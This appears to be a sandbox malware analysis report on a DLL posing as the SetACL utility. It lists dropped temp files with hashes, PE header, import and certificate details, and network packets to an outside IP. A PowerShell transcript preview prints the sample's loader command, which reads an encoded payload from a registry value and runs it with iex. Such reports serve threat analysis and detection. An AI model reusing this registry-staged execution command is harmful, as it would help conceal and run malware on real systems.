SSDEEP:	24:etGSc8OmD3lm85z7Go7gibL4eEtkZf1EVUh0XI+ycuZhNrakStPNnq:62m3r5OibDbJ1cai1ulra33q
MD5:	797C2074AF61D3377500F7478819D96D
SHA1:	403322E229E75AE7880215DB798AC5AC93403A15
SHA-256:	B3BC6D4F92212C939C348C91EA6473C1E2331C26D353C417FC0CCAF66C4EC6D5
SHA-512:	5EC9DDD346A0499792774DE48A5600F9F2DCA1F61FD85090271C313CD5CC0449EFC9CC32D19D99AB6D78C998BA42A713D911B461355472D40DD0A314294F21C0
Malicious:	false
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....[._...........!.................$... ...@....... ....................................@..................................#..W....@.......................`....................................................... ............... ..H............text........ ...................... ..`.rsrc........@......................@..@.reloc.......`......................@..B..................(....BSJB............v4.0.30319......l...H...#~......<...#Strings............#US.........#GUID.......T...#Blob...........G.........%3............................................................2.+...................................................... 9............ F............ Y.....P ......d.........j.....r.....z.....................d. ...d...!.d.%...d............3.2.....9.......F.......Y......................................."........<Module>.lcbc4odh.dll.qvpflp.W32.mscorlib.S

C:\Users\user\AppData\Local\Temp\lcbc4odh\lcbc4odh.out Download File
Process:	C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
File Type:	ASCII text, with CRLF, CR line terminators
Category:	modified
Size (bytes):	412
Entropy (8bit):	4.871364761010112
Encrypted:	false
SSDEEP:	12:zKaMK4BFNn5KBZvK2wo8dRSgarZucvW3ZDPOU:zKaM5DqBVKVrdFAMBJTH
MD5:	83B3C9D9190CE2C57B83EEE13A9719DF
SHA1:	ABFAB07DEA88AF5D3AF75970E119FE44F43FE19E
SHA-256:	B5D219E5143716023566DD71C0195F41F32C3E7F30F24345E1708C391DEEEFDA
SHA-512:	0DE42AC5924B8A8E977C1330E9D7151E9DCBB1892A038C1815321927DA3DB804EC13B129196B6BC84C7BFC9367C1571FCD128CCB0645EAC7418E39A91BC2FEDB
Malicious:	false
Preview:	Microsoft (R) Visual C# Compiler version 4.7.3056.0...for C# 5..Copyright (C) Microsoft Corporation. All rights reserved.......This compiler is provided as part of the Microsoft (R) .NET Framework, but only supports language versions up to C# 5, which is no longer the latest version. For compilers that support newer versions of the C# programming language, see http://go.microsoft.com/fwlink/?LinkID=533240....

C:\Users\user\AppData\Local\Temp\~DF224E930954C99BCE.TMP Download File
Process:	C:\Program Files\internet explorer\iexplore.exe
File Type:	data
Category:	dropped
Size (bytes):	39649
Entropy (8bit):	0.5745713495798501
Encrypted:	false
SSDEEP:	192:kBqoxKAuqR+uoCLYGQ7fHCJjQ7fHCJvQ7fHCJU:kBqoxKAuqR+uoCLYGQbHkQbHsQbHd
MD5:	5668D53AF80E84C5F973C20AC3FC41E5
SHA1:	925F80906E99D4B5DFD2931D3BCE330FB2A9394A
SHA-256:	849C82FE48D36BE9DC11D832743CF7752E630A3C2602E90095E170FDF70BD657
SHA-512:	8DA862D85A10022138AB9300FD18E3BADC2E49EB76602D01C1EF162FE25C2AED4C797C91613BDB35505BCE7255CDC8EF6C92B70085CA266FFBFF3494B0CEEE44
Malicious:	false
Preview:	.............................%..H..M..{y..+.0...(................... ...............................................%..H..M..{y..+.0...(................... ..........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\~DF40EAD1D3FC8CB615.TMP Download File
Process:	C:\Program Files\internet explorer\iexplore.exe
File Type:	data
Category:	dropped
Size (bytes):	12933
Entropy (8bit):	0.4117706414481128
Encrypted:	false
SSDEEP:	12:c9lCg5/9lCgeK9l26an9l26an9l8fRZaT9l8fRZaT9lTqZaVfrifLaXE:c9lLh9lLh9lIn9lIn9log9low9lWn
MD5:	20AC230DBED08356E99807E8A74242DD
SHA1:	25C289205C5B50D5754F02F8C00296EAC0F61A25
SHA-256:	AA06450A8900986E03B3048FD74ECE04346185097E0526F1FC9D8514504BD941
SHA-512:	3DC86AB8CCC4F5EB845AB7461413A1B02405E0DB968F808325EEC8D0D6E3AA82EA0BA2F0ACE41BDF5DB8CBED8E7B9C5CF6063D247918C4B420DF9C5F970DDD40
Malicious:	false
Preview:	.............................%..H..M..{y..+.0...(................... ...............................................%..H..M..{y..+.0...(................... ..........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\~DF84DF937AAC9CE9CE.TMP Download File
Process:	C:\Program Files\internet explorer\iexplore.exe
File Type:	data
Category:	dropped
Size (bytes):	39617
Entropy (8bit):	0.5688735729018515
Encrypted:	false
SSDEEP:	48:kBqoxKAuvScS+DdvmiIiGkpyalS1svXkUkpyalS1svXkskpyalS1svXk9:kBqoxKAuvScS+DdvmtPBN10BN1MBN1d
MD5:	6A9DF7C79ECA70095B42727D33CAD666
SHA1:	4FA47B35F9D986F432413755F2E67B805977C893
SHA-256:	50889CFC45E707D0FC042B3D1D2CF6E52F8A27191C965AF3C6C011F32F3FA565
SHA-512:	4D79CD69403E15D384F6DA61F2FB4619FCB8F6FBFBE701BA8BBD8DBDF56D88F44A43957672D1FDDA30B42E4BDC5CA470EC77C69C4B82CA7A290D3993EE915E9D
Malicious:	false
Preview:	.............................%..H..M..{y..+.0...(................... ...............................................%..H..M..{y..+.0...(................... ..........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\~DF861707AFF7D2DC9E.TMP Download File
Process:	C:\Program Files\internet explorer\iexplore.exe
File Type:	data
Category:	dropped
Size (bytes):	39601
Entropy (8bit):	0.5646370590456985
Encrypted:	false
SSDEEP:	48:kBqoxKAuvScS+Ye0F5I5uvkDEan/w9Lf0vkDEan/w9LfUvkDEan/w9LfV:kBqoxKAuvScS+Ye0FO4KRBKRdKRC
MD5:	5B52AFF4F6CA83CBD7BFF117D946A924
SHA1:	CF976016C0061E1CE0E8EB255315B4981AE9489C
SHA-256:	0CED1ABAB773B16474BDA00937199BA13A7A12390335C8C15EC829B1732B86AE
SHA-512:	F744B8A9C648CF7B73FE7A0C181A5D4690B60118AFF282E92E7CCB1CE64A9C0571E4671510EE94F1B40AEE8C1105BA3787350F0B45B55E85EA09BD5CBC693227
Malicious:	false
Preview:	.............................%..H..M..{y..+.0...(................... ...............................................%..H..M..{y..+.0...(................... ..........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\~DF907A0632D9B8351A.TMP Download File
Process:	C:\Program Files\internet explorer\iexplore.exe
File Type:	data
Category:	dropped
Size (bytes):	39609
Entropy (8bit):	0.565468019570209
Encrypted:	false
SSDEEP:	48:kBqoxKAuvScS+P5vdcgIgSmDehlmF0SWQmDehlmF0SWkmDehlmF0SW9:kBqoxKAuvScS+xvdc/hllKTllK7llKA
MD5:	4FA649B324D87D8EA220D1EC7EFC2DEC
SHA1:	B97A9498986C7904A1F98FA9EA2C6BAF8E6236B4
SHA-256:	4F5BE5B62FD6F9F97B8024B0B115AA94AA08D79438E38C9344A66B9DBA1435AA
SHA-512:	3F2A7B0CFDC20A59EC201E2A090A60C480485FD09645EED7578BE803CA7CFC9B3B7E1ACC2372EE07EE1F92A4E17577B5EFB5A611E6733B6F9FD719CD74489EEC
Malicious:	false
Preview:	.............................%..H..M..{y..+.0...(................... ...............................................%..H..M..{y..+.0...(................... ..........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\~DFB41C4A7C121490E0.TMP Download File
Process:	C:\Program Files\internet explorer\iexplore.exe
File Type:	data
Category:	dropped
Size (bytes):	13269
Entropy (8bit):	0.6168396641468885
Encrypted:	false
SSDEEP:	24:c9lLh9lLh9lIn9lIn9lo/9lo/9lWYZgPXrorq:kBqoIg+8qB
MD5:	6C504FF99B3014B1E582E6E2D56346D2
SHA1:	7731ACD67BB31BD92132AF50D00B852502B74510
SHA-256:	D86F6005A7EA9819B3D01A2F5505A48B4DD4A6737B6EDCCC0AB89E48F0CFA075
SHA-512:	2BDD36B9E95AF4F804F17C2EEF75030428496DAC7E0421A0D94CB6903C23646005918E2EB0E9D508EB3B9157C3DB147C76560BE9450D6494EFFD40F8AEA13A12
Malicious:	false
Preview:	.............................%..H..M..{y..+.0...(................... ...............................................%..H..M..{y..+.0...(................... ..........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\Documents\20201216\PowerShell_transcript.320946.tianP39F.20201216110746.txt Download File
Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	UTF-8 Unicode (with BOM) text, with CRLF line terminators
Category:	dropped
Size (bytes):	1191
Entropy (8bit):	5.302037611559265
Encrypted:	false
SSDEEP:	24:BxSAsDvBBOx2DOXUWOLCHGI4MW2HjeTKKjX4CIym1ZJXSOLCHGI4unxSAZ4:BZ4v/OoORF4X2qDYB1ZQF4AZZ4
MD5:	EF8BC67B66A1B184E9FBC9967CFCF074
SHA1:	0998E5B82EAE69A9C12A33809B8DACD7701C63BD
SHA-256:	4221194474E6C6EC37FB1CF3D158C9D68E8A689DA5C61227C472E9B381DC5F6D
SHA-512:	BC871B481C3D8D4F1B8658CCED1EC908EA5D102A97980256CDEE3C85C21882DB409D789840308B67ED063DD0661D88673DEF157448B2DDF43A906234CDC3DACB
Malicious:	false
Preview:	.********************..Windows PowerShell transcript start..Start time: 20201216110747..Username: computer\user..RunAs User: computer\user..Configuration Name: ..Machine: 320946 (Microsoft Windows NT 10.0.17134.0)..Host Application: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe iex ([System.Text.Encoding]::ASCII.GetString(( gp HKCU:Software\AppDataLow\Software\Microsoft\54E80703-A337-A6B8-CDC8-873A517CAB0E).Barclers))..Process ID: 6620..PSVersion: 5.1.17134.1..PSEdition: Desktop..PSCompatibleVersions: 1.0, 2.0, 3.0, 4.0, 5.0, 5.1.17134.1..BuildVersion: 10.0.17134.1..CLRVersion: 4.0.30319.42000..WSManStackVersion: 3.0..PSRemotingProtocolVersion: 2.3..SerializationVersion: 1.1.0.1..******************..******************..Command start time: 20201216110747..******************..PS>iex ([System.Text.Encoding]::ASCII.GetString(( gp HKCU:Software\AppDataLow\Software\Microsoft\54E80703-A337-A6B8-CDC8-873A517CAB0E).Barclers))..********************

Static File Info

General
File type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Entropy (8bit):	4.3879309324745925
TrID:	Win32 Dynamic Link Library (generic) (1002004/3) 99.60% Generic Win/DOS Executable (2004/3) 0.20% DOS Executable Generic (2002/1) 0.20% VXD Driver (31/22) 0.00% Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
File name:	5fd9d7ec9e7aetar.dll
File size:	227160
MD5:	7d675f9a252b26cd655607ae8b36c3e9
SHA1:	522894a5e30417192c053579d583ff7a690316a7
SHA256:	5e7f200f26fb2fc09ca80862fc6bec38f7d539aada080af6461771f9233c054f
SHA512:	d0775639c2626d5edcb0bc0e56c1a7ae3b383e39ed4c545d52e05f7af5199310515bfd1f35f6af6d900513aabd48c9efa46849670e2c90bc478f86780fa9e44b
SSDEEP:	3072:CnuHbFfxWATrVSuKiYDAH4n9UGlx6qTGc5:4uHZfBNvKi74jD5
File Content Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......_...........!...2.............................................................$.....................................

File Icon


Icon Hash:	74f0e4ecccdce0e4

Static PE Info

General
Entrypoint:	0x100181c0
Entrypoint Section:	.text
Digitally signed:	true
Imagebase:	0x10000000
Subsystem:	windows gui
Image File Characteristics:	LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, EXECUTABLE_IMAGE, DLL, LINE_NUMS_STRIPPED
DLL Characteristics:
Time Stamp:	0x5FD9CFCC [Wed Dec 16 09:13:48 2020 UTC]
TLS Callbacks:
CLR (.Net) Version:
OS Version Major:	4
OS Version Minor:	0
File Version Major:	4
File Version Minor:	0
Subsystem Version Major:	4
Subsystem Version Minor:	0
Import Hash:	fadb90fc79082817138430b056633ad5

Authenticode Signature

Signature Valid:	false
Signature Issuer:	CN=EZAONLTXVKKBZRNZMN
Signature Validation Error:	A certificate chain processed, but terminated in a root certificate which is not trusted by the trust provider
Error Number:	-2146762487
Not Before, Not After	12/14/2020 12:55:27 PM 12/31/2039 3:59:59 PM
Subject Chain	CN=EZAONLTXVKKBZRNZMN
Version:	3
Thumbprint MD5:	B88EEDB5320FB0D2EC1A60EBDE7B41A0
Thumbprint SHA-1:	40D98D2D970A09B6D811758450FA663FBE948B9B
Thumbprint SHA-256:	6B85B4BA21DE5A70D143A2ACED6B4709CC5E5CB4B3FD447B90DE7ADE4FF45D13
Serial:	049C616C0672439949293B869E14714A

Entrypoint Preview

Instruction
push ebp
mov ebp, esp
sub esp, 40h
mov dword ptr [ebp-08h], 00000001h
mov dword ptr [ebp-04h], 00000000h
mov eax, ebp
mov ecx, dword ptr [eax+08h]
mov dword ptr [10035610h], ecx
mov dword ptr [100355F0h], ebp
mov dword ptr [ebp-24h], 00000001h
mov dword ptr [ebp-2Ch], 00000001h
mov dword ptr [ebp-3Ch], 00000001h
mov dword ptr [ebp-14h], 00000001h
mov dword ptr [ebp-20h], 00000001h
mov dword ptr [ebp-28h], 00000001h
mov dword ptr [ebp-38h], 00000001h
mov dword ptr [ebp-10h], 00000001h
mov dword ptr [ebp-1Ch], 00000001h
mov dword ptr [ebp-30h], 00000001h
mov dword ptr [ebp-18h], 00000001h
mov dword ptr [ebp-34h], 00000001h
mov dword ptr [ebp-0Ch], 00000001h
mov eax, dword ptr [ebp-28h]
push eax
call dword ptr [100349B8h]
push 1003444Ch
call dword ptr [100349E0h]
mov ecx, dword ptr [ebp-30h]
push ecx
call dword ptr [100349E4h]
mov edx, dword ptr [ebp-14h]
push edx
call dword ptr [100349E8h]
mov eax, dword ptr [ebp-38h]
push eax
call dword ptr [100349BCh]
mov ecx, dword ptr [ebp-28h]
push ecx
call dword ptr [100349ECh]
push 10034450h
call dword ptr [100349C0h]

Data Directories

Name	Virtual Address	Virtual Size	Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IMPORT	0x34474	0x64	.data
IMAGE_DIRECTORY_ENTRY_RESOURCE	0x3a000	0x12a4	.rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION	0x0	0x0
IMAGE_DIRECTORY_ENTRY_SECURITY	0x36200	0x1558
IMAGE_DIRECTORY_ENTRY_BASERELOC	0x3c000	0x17d4	.reloc
IMAGE_DIRECTORY_ENTRY_DEBUG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COPYRIGHT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_GLOBALPTR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_TLS	0x0	0x0
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IAT	0x3476c	0x294	.data
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_RESERVED	0x0	0x0

Sections

Name	Virtual Address	Virtual Size	Raw Size	Xored PE	ZLIB Complexity	File Type	Entropy	Characteristics
.text	0x1000	0x181d9	0x18200	False	0.50908759715	data	6.29847845682	IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
.data3	0x1a000	0x64	0x200	False	0.02734375	data	0.0	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_WRITE, IMAGE_SCN_MEM_READ
.data	0x1b000	0x1a66c	0x1a600	False	0.02227117891	data	0.658669009366	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_WRITE, IMAGE_SCN_MEM_READ
.data7	0x36000	0x64	0x200	False	0.02734375	data	0.0	IMAGE_SCN_MEM_WRITE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
.data6	0x37000	0x64	0x200	False	0.02734375	data	0.0	IMAGE_SCN_MEM_WRITE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
.data5	0x38000	0x64	0x200	False	0.02734375	data	0.0	IMAGE_SCN_MEM_WRITE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
.data4	0x39000	0x64	0x200	False	0.02734375	data	0.0	IMAGE_SCN_MEM_WRITE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
.rsrc	0x3a000	0x12a4	0x1400	False	0.2841796875	data	3.50165474523	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.reloc	0x3c000	0x17d4	0x1800	False	0.485026041667	data	6.31327227722	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

Resources

Name	RVA	Size	Type	Language	Country
RT_STRING	0x3a148	0x420	data	English	United States
RT_STRING	0x3a568	0x3e0	data	English	United States
RT_STRING	0x3a948	0x4f6	data	English	United States
RT_RCDATA	0x3ae40	0x15a	ASCII text, with CRLF line terminators	English	United States
RT_VERSION	0x3af9c	0x308	data	German	Germany

Imports

DLL	Import
KERNEL32.dll	ExpandEnvironmentStringsW, GetShortPathNameW, InitializeCriticalSectionAndSpinCount, RaiseException, DecodePointer, DeleteCriticalSection, GetLogicalDrives, GetSystemDefaultLCID, DeviceIoControl, SetErrorMode, GetLocaleInfoW, MultiByteToWideChar, GetUserDefaultLCID, GetTimeFormatW, GetComputerNameW, WideCharToMultiByte, GetSystemTime, GetDateFormatW, GetDriveTypeW, GetCurrentThreadId, ProcessIdToSessionId, AttachConsole, FreeConsole, GetLongPathNameW, GetExitCodeProcess, DuplicateHandle, SetEvent, GetCurrentProcessId, GetModuleFileNameW, ReadFile, SetFilePointer, UnmapViewOfFile, GetFileInformationByHandle, FileTimeToSystemTime, GetLocalTime, GetFileSize, SystemTimeToFileTime, GetTickCount, GetFullPathNameW, lstrcmpW, CreateThread, CreateEventW, FlushFileBuffers, MulDiv, GetEnvironmentStringsW, FreeLibrary, GetModuleHandleW, HeapSize, WriteConsoleW, SetEnvironmentVariableA, GetCommandLineW, GetCommandLineA, FindFirstFileExW, GetProcessHeap, GetSystemTimeAsFileTime, SetStdHandle, GetCurrentDirectoryW, GetOEMCP, IsValidCodePage, EnumSystemLocalesW, GetProcAddress, LoadResource, FindResourceExW, CloseHandle, GlobalFree, GlobalAlloc, LockResource, GetCurrentThread, GetDiskFreeSpaceExW, OpenProcess, FreeEnvironmentStringsW, CreateFileW, WriteFile, GetCurrentProcess, SizeofResource, GetLastError, WaitForSingleObject, GetVolumePathNamesForVolumeNameW, CreateProcessW, FindVolumeClose, Sleep, CreatePipe, LoadLibraryW, IsValidLocale, GetConsoleCP, ReadConsoleW, SetEndOfFile, QueryDosDeviceW, GetModuleHandleExW, ExitProcess, HeapFree, HeapReAlloc, HeapAlloc, SetConsoleCtrlHandler, SetConsoleMode, ReadConsoleInputA, GetConsoleMode, SetFilePointerEx, SystemTimeToTzSpecificLocalTime, PeekNamedPipe, GetFileType, GetACP, TerminateProcess, GetTimeZoneInformation, LoadLibraryExW, RtlUnwind, InitializeSListHead, QueryPerformanceCounter, GetStartupInfoW, SetUnhandledExceptionFilter, UnhandledExceptionFilter, IsDebuggerPresent, IsProcessorFeaturePresent, GetCPInfo, LCMapStringW, CompareStringW, TlsFree, TlsSetValue, TlsGetValue, TlsAlloc, EncodePointer, LeaveCriticalSection, EnterCriticalSection, GetStringTypeW, OutputDebugStringW, OutputDebugStringA, FlushConsoleInputBuffer, GetStdHandle, FindClose, FindNextFileW, ExpandEnvironmentStringsA, GetModuleHandleA, VerifyVersionInfoA, FormatMessageA, SetLastError, WaitForMultipleObjectsEx, GetTempPathW, LoadLibraryA, GetSystemDirectoryA, InterlockedCompareExchange, SleepEx, FindNextVolumeW, FindFirstVolumeW, VirtualAlloc
USER32.dll	LoadIconW, CharNextA, DestroyCursor, DestroyIcon, CharUpperW, OpenIcon, GetClipboardOwner, IsGUIThread, GetClipboardData
GDI32.dll	DeleteColorSpace, RealizePalette, CreateMetaFileA, CloseFigure, AbortPath, GetMapMode, GdiGetBatchLimit
ADVAPI32.dll	RegOpenKeyW

Version Infos

Description	Data
LegalCopyright	Copyright Helge Klein
InternalName	SetACL
FileVersion	2, 1, 3, 0
CompanyName	Helge Klein
Comments	SetACL command line version
ProductName	SetACL
ProductVersion	2, 1, 3, 0
FileDescription	SetACL 2
OriginalFilename	SetACL.exe
Translation	0x0409 0x04b0

Possible Origin

Language of compilation system	Country where language is spoken	Map
English	United States
German	Germany

Network Behavior

Network Port Distribution

TCP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Dec 16, 2020 11:07:30.982773066 CET	49740	80	192.168.2.5	193.56.255.167
Dec 16, 2020 11:07:30.982836008 CET	49741	80	192.168.2.5	193.56.255.167
Dec 16, 2020 11:07:31.141237974 CET	80	49740	193.56.255.167	192.168.2.5
Dec 16, 2020 11:07:31.141347885 CET	49740	80	192.168.2.5	193.56.255.167
Dec 16, 2020 11:07:31.141427994 CET	80	49741	193.56.255.167	192.168.2.5
Dec 16, 2020 11:07:31.141510010 CET	49741	80	192.168.2.5	193.56.255.167
Dec 16, 2020 11:07:31.141976118 CET	49740	80	192.168.2.5	193.56.255.167
Dec 16, 2020 11:07:31.300307035 CET	80	49740	193.56.255.167	192.168.2.5
Dec 16, 2020 11:07:31.336008072 CET	80	49740	193.56.255.167	192.168.2.5
Dec 16, 2020 11:07:31.336056948 CET	80	49740	193.56.255.167	192.168.2.5
Dec 16, 2020 11:07:31.336086035 CET	80	49740	193.56.255.167	192.168.2.5
Dec 16, 2020 11:07:31.336122990 CET	80	49740	193.56.255.167	192.168.2.5
Dec 16, 2020 11:07:31.336170912 CET	49740	80	192.168.2.5	193.56.255.167
Dec 16, 2020 11:07:31.336175919 CET	80	49740	193.56.255.167	192.168.2.5
Dec 16, 2020 11:07:31.336219072 CET	80	49740	193.56.255.167	192.168.2.5
Dec 16, 2020 11:07:31.336260080 CET	80	49740	193.56.255.167	192.168.2.5
Dec 16, 2020 11:07:31.336271048 CET	49740	80	192.168.2.5	193.56.255.167
Dec 16, 2020 11:07:31.336316109 CET	80	49740	193.56.255.167	192.168.2.5
Dec 16, 2020 11:07:31.336344004 CET	80	49740	193.56.255.167	192.168.2.5
Dec 16, 2020 11:07:31.336385965 CET	80	49740	193.56.255.167	192.168.2.5
Dec 16, 2020 11:07:31.336385965 CET	49740	80	192.168.2.5	193.56.255.167
Dec 16, 2020 11:07:31.336451054 CET	80	49740	193.56.255.167	192.168.2.5
Dec 16, 2020 11:07:31.336453915 CET	49740	80	192.168.2.5	193.56.255.167
Dec 16, 2020 11:07:31.336493015 CET	80	49740	193.56.255.167	192.168.2.5
Dec 16, 2020 11:07:31.336503983 CET	49740	80	192.168.2.5	193.56.255.167
Dec 16, 2020 11:07:31.336558104 CET	80	49740	193.56.255.167	192.168.2.5
Dec 16, 2020 11:07:31.336560011 CET	49740	80	192.168.2.5	193.56.255.167
Dec 16, 2020 11:07:31.336612940 CET	80	49740	193.56.255.167	192.168.2.5
Dec 16, 2020 11:07:31.336641073 CET	80	49740	193.56.255.167	192.168.2.5
Dec 16, 2020 11:07:31.336657047 CET	49740	80	192.168.2.5	193.56.255.167
Dec 16, 2020 11:07:31.336705923 CET	49740	80	192.168.2.5	193.56.255.167
Dec 16, 2020 11:07:31.495167971 CET	80	49740	193.56.255.167	192.168.2.5
Dec 16, 2020 11:07:31.495237112 CET	80	49740	193.56.255.167	192.168.2.5
Dec 16, 2020 11:07:31.495265007 CET	80	49740	193.56.255.167	192.168.2.5
Dec 16, 2020 11:07:31.495296001 CET	80	49740	193.56.255.167	192.168.2.5
Dec 16, 2020 11:07:31.495333910 CET	80	49740	193.56.255.167	192.168.2.5
Dec 16, 2020 11:07:31.495362043 CET	80	49740	193.56.255.167	192.168.2.5
Dec 16, 2020 11:07:31.495405912 CET	80	49740	193.56.255.167	192.168.2.5
Dec 16, 2020 11:07:31.495428085 CET	49740	80	192.168.2.5	193.56.255.167
Dec 16, 2020 11:07:31.495461941 CET	80	49740	193.56.255.167	192.168.2.5
Dec 16, 2020 11:07:31.495502949 CET	80	49740	193.56.255.167	192.168.2.5
Dec 16, 2020 11:07:31.495558023 CET	80	49740	193.56.255.167	192.168.2.5
Dec 16, 2020 11:07:31.495567083 CET	49740	80	192.168.2.5	193.56.255.167
Dec 16, 2020 11:07:31.495600939 CET	49740	80	192.168.2.5	193.56.255.167
Dec 16, 2020 11:07:31.495613098 CET	80	49740	193.56.255.167	192.168.2.5
Dec 16, 2020 11:07:31.495615959 CET	49740	80	192.168.2.5	193.56.255.167
Dec 16, 2020 11:07:31.495642900 CET	80	49740	193.56.255.167	192.168.2.5
Dec 16, 2020 11:07:31.495676041 CET	49740	80	192.168.2.5	193.56.255.167
Dec 16, 2020 11:07:31.495680094 CET	80	49740	193.56.255.167	192.168.2.5
Dec 16, 2020 11:07:31.495731115 CET	80	49740	193.56.255.167	192.168.2.5
Dec 16, 2020 11:07:31.495768070 CET	80	49740	193.56.255.167	192.168.2.5
Dec 16, 2020 11:07:31.495795012 CET	49740	80	192.168.2.5	193.56.255.167
Dec 16, 2020 11:07:31.495805979 CET	80	49740	193.56.255.167	192.168.2.5
Dec 16, 2020 11:07:31.495856047 CET	80	49740	193.56.255.167	192.168.2.5
Dec 16, 2020 11:07:31.495867968 CET	49740	80	192.168.2.5	193.56.255.167
Dec 16, 2020 11:07:31.495896101 CET	80	49740	193.56.255.167	192.168.2.5
Dec 16, 2020 11:07:31.495951891 CET	80	49740	193.56.255.167	192.168.2.5
Dec 16, 2020 11:07:31.495955944 CET	49740	80	192.168.2.5	193.56.255.167
Dec 16, 2020 11:07:31.495995998 CET	80	49740	193.56.255.167	192.168.2.5
Dec 16, 2020 11:07:31.496009111 CET	49740	80	192.168.2.5	193.56.255.167
Dec 16, 2020 11:07:31.496021986 CET	80	49740	193.56.255.167	192.168.2.5
Dec 16, 2020 11:07:31.496052027 CET	49740	80	192.168.2.5	193.56.255.167
Dec 16, 2020 11:07:31.496058941 CET	80	49740	193.56.255.167	192.168.2.5
Dec 16, 2020 11:07:31.496098042 CET	80	49740	193.56.255.167	192.168.2.5
Dec 16, 2020 11:07:31.496121883 CET	80	49740	193.56.255.167	192.168.2.5
Dec 16, 2020 11:07:31.496155024 CET	49740	80	192.168.2.5	193.56.255.167
Dec 16, 2020 11:07:31.496159077 CET	80	49740	193.56.255.167	192.168.2.5
Dec 16, 2020 11:07:31.496196985 CET	80	49740	193.56.255.167	192.168.2.5
Dec 16, 2020 11:07:31.496231079 CET	80	49740	193.56.255.167	192.168.2.5
Dec 16, 2020 11:07:31.496252060 CET	49740	80	192.168.2.5	193.56.255.167
Dec 16, 2020 11:07:31.496272087 CET	80	49740	193.56.255.167	192.168.2.5
Dec 16, 2020 11:07:31.496309996 CET	80	49740	193.56.255.167	192.168.2.5
Dec 16, 2020 11:07:31.496335983 CET	80	49740	193.56.255.167	192.168.2.5
Dec 16, 2020 11:07:31.496335983 CET	49740	80	192.168.2.5	193.56.255.167
Dec 16, 2020 11:07:31.496362925 CET	49740	80	192.168.2.5	193.56.255.167
Dec 16, 2020 11:07:31.654689074 CET	80	49740	193.56.255.167	192.168.2.5
Dec 16, 2020 11:07:31.654747963 CET	80	49740	193.56.255.167	192.168.2.5
Dec 16, 2020 11:07:31.654767990 CET	80	49740	193.56.255.167	192.168.2.5
Dec 16, 2020 11:07:31.654812098 CET	80	49740	193.56.255.167	192.168.2.5
Dec 16, 2020 11:07:31.654865026 CET	80	49740	193.56.255.167	192.168.2.5
Dec 16, 2020 11:07:31.654905081 CET	80	49740	193.56.255.167	192.168.2.5
Dec 16, 2020 11:07:31.654962063 CET	80	49740	193.56.255.167	192.168.2.5
Dec 16, 2020 11:07:31.654963017 CET	49740	80	192.168.2.5	193.56.255.167
Dec 16, 2020 11:07:31.655019999 CET	80	49740	193.56.255.167	192.168.2.5
Dec 16, 2020 11:07:31.655056953 CET	80	49740	193.56.255.167	192.168.2.5
Dec 16, 2020 11:07:31.655066013 CET	49740	80	192.168.2.5	193.56.255.167
Dec 16, 2020 11:07:31.655097961 CET	80	49740	193.56.255.167	192.168.2.5
Dec 16, 2020 11:07:31.655134916 CET	49740	80	192.168.2.5	193.56.255.167
Dec 16, 2020 11:07:31.655144930 CET	80	49740	193.56.255.167	192.168.2.5
Dec 16, 2020 11:07:31.655174971 CET	80	49740	193.56.255.167	192.168.2.5
Dec 16, 2020 11:07:31.655224085 CET	49740	80	192.168.2.5	193.56.255.167
Dec 16, 2020 11:07:31.655226946 CET	80	49740	193.56.255.167	192.168.2.5
Dec 16, 2020 11:07:31.655286074 CET	80	49740	193.56.255.167	192.168.2.5
Dec 16, 2020 11:07:31.655313969 CET	49740	80	192.168.2.5	193.56.255.167
Dec 16, 2020 11:07:31.655316114 CET	80	49740	193.56.255.167	192.168.2.5
Dec 16, 2020 11:07:31.655354977 CET	80	49740	193.56.255.167	192.168.2.5
Dec 16, 2020 11:07:31.655395985 CET	49740	80	192.168.2.5	193.56.255.167
Dec 16, 2020 11:07:31.655412912 CET	80	49740	193.56.255.167	192.168.2.5
Dec 16, 2020 11:07:31.655441046 CET	80	49740	193.56.255.167	192.168.2.5
